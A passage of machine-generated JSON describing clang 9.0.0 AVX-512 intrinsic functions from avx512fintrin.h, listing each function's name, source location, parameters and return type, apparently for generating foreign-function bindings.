"__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2945:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3004:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3014:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask3_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3024:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3034:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3044:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3054:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3064:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask3_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3081:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask3_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3097:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask3_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask3_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3131:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3148:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3189:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask3_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3199:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3223:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask3_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3233:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3247:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask2_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3263:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3272:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3281:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask2_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3297:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3306:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_blend_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3376:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_blend_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3384:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_blend_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3392:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_blend_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3538:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3548:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3557:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3596:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3610:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3618:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3624:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtepi32lo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3640:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32lo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3652:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3658:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3666:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3674:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3680:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3688:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtepu32lo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3696:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtepu32lo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3702:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3723:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_mask_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3732:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_maskz_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3741:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_cvtpd_pslo", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3750:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_cvtpd_pslo", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3758:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3803:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3813:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3822:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3846:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3855:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3864:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3888:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3897:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3906:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3930:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3939:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3948:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3973:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3983:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:3992:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_cvtps_epu32", "ns": 0, "location": 